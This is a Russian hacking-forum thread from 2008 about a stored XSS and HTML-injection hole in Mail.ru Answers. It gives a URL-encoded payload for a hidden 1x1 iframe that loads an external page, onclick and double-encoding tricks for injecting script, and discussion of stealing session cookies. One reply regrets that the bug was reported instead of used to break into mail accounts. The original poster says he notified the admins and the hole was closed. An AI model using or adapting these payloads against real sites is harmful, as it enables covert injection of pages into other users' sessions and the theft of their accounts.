HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Уязвимость на Ответах Мейлру
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость на Ответах Мейлру
  #1  
Старый 13.02.2008, 17:22
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию Уязвимость на Ответах Мейлру
Сегодня мной была обнаружена уязвимость на Проекте Ответы Mail>ru

В результате можно было встроить айфрейм с сайтом произвольным в коментарии и в вопросы...
и соответственно любой вредоносный код...

примеры здесь



примеры
примеры
примеры
А также были фреймы с моим порносайтом .. но их удалили


Собственно -рассказываю как )))

все теги фильтруются и обрезаются...
с этим не поспоришь -майловцы молодцы )))

Но они упустили кое что
если теги заурленкодить Можно здесь

То они на мейлру уже декодируются а дальше не фильтруются!!!!
и в итоге получаем .... хехех ... попробую на ачате )))
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E

на ачате форум фильтрует все ... точнее не перекодирует обратно урленкод..

PHP код:
%3Ciframe src%3Dhttp%3A%2F%2Fantispid.jino-net.ru%2FWM.html width%3D1 height%3D1%3E%3C%2Fiframe%3E 
вот такая загогулина... и ее постим в каментах или в вопросе...
и получаем фрейм.. также можно любые теги....
кроме
Код HTML:
<script>
Вотс... правда я как законопослушный гражданин -написал в суппорт и админам .. так что ..вот такая вот загогулина ))
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось попугай; 13.02.2008 в 20:35..
 
Ответить с цитированием

  #2  
Старый 13.02.2008, 18:58
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
http://otvet.mail.ru/question/12964134/
 
Ответить с цитированием

  #3  
Старый 13.02.2008, 19:18
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Я только не очень силен в яваскрипте.... но можно ведь как то получить доступ через фрейм к родительскому окну ?
 
Ответить с цитированием

  #4  
Старый 13.02.2008, 19:44
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Жаль скрипты все таки фильтируются
Последний раз редактировалось попугай; 13.02.2008 в 20:30..
 
Ответить с цитированием

  #5  
Старый 14.02.2008, 03:26
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
скрпты тоже можно писать !!!!
Опять же урленкодим....

таким образом...
PHP код:
<input type=button onclick=скрипт произвольный
одно но... кавычки заслешиваются... так что серьезного ничего не сделать....

PS // хмм... и кавычки можно обойти ))
Последний раз редактировалось попугай; 14.02.2008 в 04:19..
 
Ответить с цитированием

  #6  
Старый 14.02.2008, 21:23
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Таак... Скрипты в виде <script> </script>
тоже можно писать -требуется двойное урленкодирование

Однако главная проблема -почему нельзя передать куки на скрипт .. -это то , что
ссылки фильтруются -то есть
если есть http -то перед ним ставятся теги <noindex> , <nofollow>
и которые портят код .
Если у кого есить идеи -выкладывайте
 
Ответить с цитированием

  #7  
Старый 15.02.2008, 05:55
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
X) X)
Все уязвимости прикрыли X)
 
Ответить с цитированием

  #8  
Старый 23.02.2008, 05:29
ZET36
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
С нами: 9785147

Репутация: 137
По умолчанию
во первых зря то сообщил админам маила
во вторых зря что выложил баг в паблик этоже активна хсс в маил ру
получить доступ к 1вому фрэйму (где авторизованные куки) через родительское окно в джаваскрипт можно так

Код:
parent.имя фрэйма.document.cookie
если бы не ступил то мог бы беспалива хакать мыльники
 
Ответить с цитированием

  #9  
Старый 05.04.2008, 02:16
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
parent.имя фрэйма.document.cookie
нельзя так... Да я и пробовал
это разные домены - и получить доступ из одного домена в другой нельзя

PS да может и зря... конечно...но гражданский долг меня позвал )))
 
Ответить с цитированием

  #10  
Старый 05.04.2008, 03:28
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию
Вместо 'http://' можешь писать просто '//'
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux обнаружена критическая уязвимость biophreak Мировые новости. Обсуждения. 8 01.09.2008 22:08
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости. Обсуждения. 5 10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer DRON-ANARCHY Мировые новости. Обсуждения. 0 02.10.2005 22:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.